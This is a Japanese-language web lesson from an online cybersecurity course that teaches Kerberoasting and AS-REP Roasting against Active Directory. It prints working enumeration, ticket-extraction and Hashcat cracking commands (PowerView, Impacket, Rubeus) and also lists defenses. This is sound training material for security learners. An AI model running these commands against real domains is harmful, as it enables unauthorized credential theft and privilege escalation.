0Pricing
Cyber Security Academy · レッスン

KerberoastingとAS-REP Roasting

Kerberosサービスチケットを要求し、Hashcatでオフライン解析します。

「KerberoastingとAS-REP Roasting」はCoddyKit上の無料Cyber Security Academyレッスンです。 これはレッスン3/4です。 下記で完全なレッスンを無料で読むことができます。その後、ブラウザ内の組み込みコードエディタと24時間対応のAIチューターでハンズオン演習できます。 これはCyber Security Academy学習パスの一部であり、ウェブとCoddyKitアプリ全体で進捗が同期されます。 Cyber Security Academyコースには全4レッスンが含まれています。

Kerberosチケットの暗号化

サービスチケットは、サービスアカウントのパスワードハッシュで暗号化されます。ドメインユーザーであれば誰でも、任意のSPNに対応するサービスチケットを要求できます。サービスアカウントのパスワードが弱い場合、チケットをオフラインでクラックできます。

Kerberoastingとは

Kerberoastingは、Service Principal Name(SPN)が設定されたアカウントのサービスチケットを要求し、暗号化されたチケットを抽出して、Hashcatでオフラインクラックする攻撃です。昇格した権限は必要なく、ドメインユーザーであれば誰でも実行できます。

# Steps:
# 1. Find accounts with SPNs
# 2. Request their service tickets
# 3. Extract ticket hashes
# 4. Crack with Hashcat

SPNの検索

PowerView、Impacket、または標準のADツールを使って、SPNが設定されたすべてのサービスアカウントを列挙します。SPNはサービスアカウントとそのサービスを関連付けます。

# PowerView (Windows)
Get-DomainUser -SPN
Get-NetUser -SPN | select name,serviceprincipalname

# Impacket (Linux)
GetUserSPNs.py CORP/user:pass@dc.corp.com

# Native LDAP query
ldapsearch -H ldap://dc -b "DC=corp,DC=com" \
  "(servicePrincipalName=*)" cn servicePrincipalName

チケットの要求と抽出

Rubeus(Windows)とImpacketのGetUserSPNs(Linux)は、どちらもチケットを要求し、クラック可能な形式で出力します。

# Rubeus (Windows)
Rubeus.exe kerberoast /format:hashcat /output:hashes.txt

# Impacket (Linux)
GetUserSPNs.py CORP/user:pass@dc.corp.com \
  -request -outputfile hashes.txt

Hashcatによるクラック

Kerberoastハッシュにはモード13100(Kerberos 5 TGS-REP)を使用します。最大限の効果を得るには、ルールを適用できる強力なワードリストを使用します。

# Crack TGS-REP hashes
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt

# With rules for better coverage
hashcat -m 13100 hashes.txt rockyou.txt -r best64.rule

# AES tickets: mode 19700 (AES128) or 19800 (AES256)

AS-REP Roastingとは

AS-REP Roastingは、Kerberosの事前認証を必要としない設定が有効なアカウントを標的にします。ASはユーザーのハッシュで暗号化したTGTを返すため、パスワードを知らなくても要求でき、オフラインでクラックできます。

事前認証が無効なアカウントの検索

事前認証のないアカウントは設定ミスであり、レガシーアプリケーションによって残されていることがよくあります。PowerViewまたはGetNPUsersを使って列挙します。

# PowerView
Get-DomainUser -PreauthNotRequired

# Impacket GetNPUsers (no password needed!)
GetNPUsers.py CORP/ -usersfile users.txt \
  -dc-ip dc.corp.com -format hashcat -outputfile asrep.txt

# Rubeus
Rubeus.exe asreproast /format:hashcat /output:asrep.txt

AS-REPハッシュのクラック

AS-REPハッシュにはHashcatのモード18200を使用します。暗号化されたAS応答に対してオフラインで辞書攻撃を行うため、クラックの手順はKerberoastingと同じです。

# Crack AS-REP hashes
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt

# With rules:
hashcat -m 18200 asrep.txt rockyou.txt -r best64.rule

影響の評価

クラックされたサービスアカウントのパスワードには、高い権限が設定されていることがよくあります。データベース、バックアップソフトウェア、Exchangeを実行するサービスアカウントがドメイン管理者である場合もあります。AS-REPの対象となるアカウントは見落とされやすく、セキュリティ対策も不十分なことが多くあります。

標的型Kerberoasting

オブジェクトへの書き込みアクセス権がある場合、高価値アカウントに一時的にSPNを追加してKerberoastingを実行し、ハッシュをクラックした後、SPNを削除できます。これにより、必要に応じて特定のアカウントを標的にできます。

防御策

Kerberoastingへの防御として、サービスアカウントには25文字以上の長くランダムなパスワードを使用します。より適切な方法として、120文字のパスワードを自動的にローテーションするGroup Managed Service Accounts(gMSA)を使用します。AS-REPに対しては、すべてのアカウントで事前認証を有効にします。

クイックチェック

AS-REP Roastingを実行するために必要なアカウント属性は何ですか?

まとめ:KerberoastingとAS-REP Roasting

どちらの攻撃も、Kerberosチケットの暗号化の弱点を悪用して、アカウントロックアウトを発生させずにパスワードをオフラインでクラックします。KerberoastingはSPNが設定されたアカウントを標的とし、ドメインユーザーであれば誰でも実行できます。AS-REP Roastingは事前認証のないアカウントを標的とし、認証情報を必要としません。サービスアカウントにはgMSAを使用し、すべてのユーザーで事前認証を必須にして防御します。

よくある質問

「KerberoastingとAS-REP Roasting」レッスンは無料ですか?

はい。「KerberoastingとAS-REP Roasting」の完全なテキストはこのウェブで無料で読めます。インタラクティブに演習し(組み込みコードエディタと24時間対応のAIチューター)、Cyber Security Academyコースの残りをアンロックするには、CoddyKit PROにアップグレードしてください。 Cyber Security Academyコースには全4レッスンが含まれています。

「KerberoastingとAS-REP Roasting」で何を学びますか?

Kerberosサービスチケットを要求し、Hashcatでオフライン解析します。 ブラウザで直接実行するハンズオンコードでCyber Security Academyを演習し、24時間対応のAIチューターがレッスンを進める中での質問に答えます。

Cyber Security Academyを始めるのに経験は必要ですか?

事前経験は必要ありません。CoddyKitのCyber Security Academyは初級者から上級者向けに構成されているため、ここから始めるか最初から始めて、自分のペースで進むことができます。 これはレッスン3/4です。

「KerberoastingとAS-REP Roasting」レッスンにはどのくらい時間がかかりますか?

ほとんどのCoddyKitレッスンは約5~10分かかります。各レッスンはコンパクトでインタラクティブなので、着実に進歩し、ウェブとアプリ全体で正確に前回の場所から再開できます。

このCyber Security Academyレッスンでコードを書いて実行できますか?

はい。すべてのCyber Security Academyレッスンに組み込みコードエディタが含まれているため、ブラウザでリアルコードを書いて実行し、即座のAIフィードバックを取得できます。ローカル設定は不要です。

このコースのすべてのレッスン

  1. Windows認証:NTLMとKerberos
  2. Pass-the-HashとPass-the-Ticket攻撃
  3. KerberoastingとAS-REP Roasting
  4. Active Directoryの強化
← Cyber Security Academyに戻る